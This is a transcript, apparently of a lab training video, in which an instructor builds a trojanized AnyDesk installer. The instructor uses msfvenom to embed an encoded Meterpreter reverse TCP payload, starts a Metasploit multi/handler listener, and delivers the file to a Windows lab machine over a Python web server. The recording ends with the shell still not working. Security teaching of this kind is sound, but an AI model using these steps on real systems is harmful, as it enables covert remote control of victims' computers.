Right, let's go ahead and take a look at our next lab here. This one is Metasploit Trojan, and we're going to understand how to bind a custom Trojan to a regular application. We're going to create a payload using AnyDesk to gain control of a target's computer, and we're going to be using Metasploit and the Metasploit framework console. So you'll need Kali and Windows, make sure that they can talk to each other. So the first thing is let's go ahead and make our Trojan. So let's go ahead. We're going to use our AnyDesk executable and embedded Trojan into that. So let's go ahead and make a malicious payload. All right, let me clear out this and we're going to exit out and clear. Okay, there we go. So let's do the Msfvenom. Right, and if you forgot what that is, you can type Msfvenom, right? Payload generator and encoder. So Msfvenom, and we want to choose Windows, so we're going to do Windows, Meterpreter. We're going to make a reverse TCP shell. Target the architecture of x86. File type will be exe. And output this, we could call it a good malware. Okay, this is also going to be x86. Shikata. Our platform is going to be Windows. Local host will be Ethernet 0. Local port for our shell 4949 -X. We're going to put this under root. Downloads slash anydesk.exe. So let me move this file to the right location here. Downloads and paste. All right. All right, let's go ahead and take a look at our syntax here. So we have Msfvenom-P of Windows using Meterpreter, reverse TCP, TAC A x86, TAC F exe-o, good malware -e x86, Shikata GA underscore NAI -I 15 platform Windows localhost equals Ethernet 0 local port equals 4949 -X and then /root /desktop /anydesk.exe. Okay, that looks good. Let's go ahead and press enter. Oh, okay, so it looks like we had something that did not validate. Well, it tells us that it's localhost and port. So let's check our syntax here and see. Oh, see what we got right here. Well, I need to make sure I use my equals sign here under each one of these. And this time, knock on wood, we should be good to go. Okay, very good. So looks like it has encoded our payload with 15 iterations of Shikata GANAI. And if you don't ever know what something means, right, go ahead and look it up. So let's copy this and let's take a look and close this. And we'll take a look here. Say, okay, what is this Shikate NJ means. So this is it cannot be helped. Encoder, and let's take a look here. Looks like it's shellcode. Yeah, Shakata Gainai. So basically, this is to create shellcode for malware payload delivery. So look at this. It is a polymorphic encoder within the Metasploit framework. This encoder offers 3 platforms that provides. Yep. So very cool there. All right. So let's go ahead and take a look back at our um, file here. And we're just going to go to Home, Downloads, and we see AnyDesk here. And we see it's 3 megs, but let's see if we can find some other information here. Let's go to Properties, and you see it was modified today. The size is 3 megs. Let's just compare that to the original file here. We do see here the unmodified one. See if we've got anything that will tell us anything different right out of the gate. Well, nothing there. 3.189712 bytes. Nothing, from the naked eye tells us that this one is encoded, but I think we'll be okay because we call ours good malware.exe. So let's keep going here. We did that. Let's go ahead and set up our listener using Metasploit. Okay, so we're going to go to, oh, look right there, root downloads. Oh, I need to check my path here. Properties. Oh, that's why. Well, let me move this file in the right location and rerun our exploit. Glad they caught that. So let me copy this, or we can do this. Let's let's make a new tab here, and we'll do su root. Okay, and we'll say downloads, and we're going to cp anydesk /root/downloads. And let's see, what is my location root downloads? Let's take a look at my root here. That might not actually be a directory. Let's see what I have here. Let's do cd/, and let's do, yeah, no downloads folder here. So we can do mkdir downloads. Okay, and we can go back to home, Kali downloads. Yep, we'll do cp any desk.exe/root/downloads. Okay, now if I go to downloads, whoops, cd/root/downloads. We say we have a file here. So let's go back up and rerun our command here again. Okay, there we go. That's what I was looking for. So we see that our file was able to be saved as good malware. And let's take a look and see if we see it in the downloads location here. So let's go to cd/root/downloads, and it's not there. So let's try cd/, let's see, let's find our file, good malware. There it is. Good malware is now in home Kali here. We do see it is bigger. It's got a current timestamp here, so we are happy with that. That was a success here. So now let's go ahead and set up our listener. So we're going to go back to Metasploit. Msfconsole. Let this get started. Okay. And next we want to look for multi/handler, which is a generic payload handler. So we're going to do search multi-handler. And you see we have option number 5, exploit multi-handler. And you got the rank, you got excellent, and other things there. So again, generic payload handler. So that's what we're going to use here. So we're just going to type in use. Whoops. Use exploit multi-handler. All right, let's go ahead and set up our ports for our shell. We're going to say set port 4949. Then we're going to say set localhost goes Ethernet 0. Okay, now we are going to set up our listener, my own local machine here, by typing in run. It says, hey, we have started our reverse TCP handler on my IP address over port 4949. Okay, next, it's time to move our payload over to our target's computer to gain control. So we're going to make a new tab here, right? And we are going to set up our web server. So we're going to do that in Python. We can just type in Python. This would be a very simple web server, right? -m simple HTTP server over 80. So if that doesn't work on yours, try Python 3. Oh, no module named. Simple HTTP server. Let me check my syntax here. If not, I might need to install it. Simple. Let's see. All right. So since I am using a newer version of Kali, I have to use Python 3, and I set my server to be on port 8000 here. So it is listening here. So let's see if we can navigate to this from our Windows machine here. So let's go to Windows, and we're going to close that and open up Internet Explorer. And my machine is on HTTP. Let's do what, 10.0.2.8 over port 8000. And you can see right here, um, we have our machine here, but we need to actually get our file here. So let's see if we can't find our file name good malware. So I'm going to move that and I'll be right back. So let's do, let's go to our Kali machine here and let's see what we have. So we have AnyDesk and I believe our stuff was in under root. Let's see. File system. Wait, there we go. Root, here we go. I need permission. Okay, that's fine. So we'll do it in the command line. Let me make a new tab here. And let's do a su root tour. Excuse me. All right. So let's move good malware to, let's see, slash wait, slash root slash downloads. Let's try that. And if we go to root slash downloads, oops. All right, got both those files here. Let's go ahead and go back to our Windows machine and see if that did the trick. So I'm gonna try to refresh here. There we go. All right, so we see our good malware here. We're going to click on good malware and we're going to save our file. And let's save it to, we'll try, yeah, download should be fine. Okay. All right, so now it's asking us, would you like to save it or run it? I'm gonna say run. It says, okay, we find a problem with this file, unknown publisher. Looks like it did not want us to run that file because it is not fine signed, but let's see, let's try this again. Let's say open, run. All right, so that's doing that. Let's go back to Kali. Let's see if we got any action here. So it looks like we had one session open that was closed. Let's try this again. So we're going to see if our program actually ran here. Let's try this run as admin. Yes. Take a look at the task manager, see if it's actually running here. Okay, so good malware is running here. Let's go back to our machine here. It says command session 2 is not valid and will be closed. So let's see what we can figure out here. I'm going to end that process and end that process as well. And let me just take a look at my Windows Defender here. And load time protection is off. Okay. That one, that's the legit one. Let's try. Let's do these side by side. So I'm going to minimize this one here. Move my Windows machine here. And let's see. Because it looks like it goes to start it, but then it stops it. But let's see what we can't figure out. All right, let's see. So I've done some changing on my back end. I've put it on a pfSense network. We're going to try again. I call this one good malware 2. Attempt to run it. Let's say run. See if we have any better luck with this one. manager. So it is running. Let's see. Good malware 2. Looks like it was running, but it has stopped. Let's go ahead and try to run this again. And it is running as a 32-bit program here. Let's see what else we got. Nothing yet. Let's keep on investigating.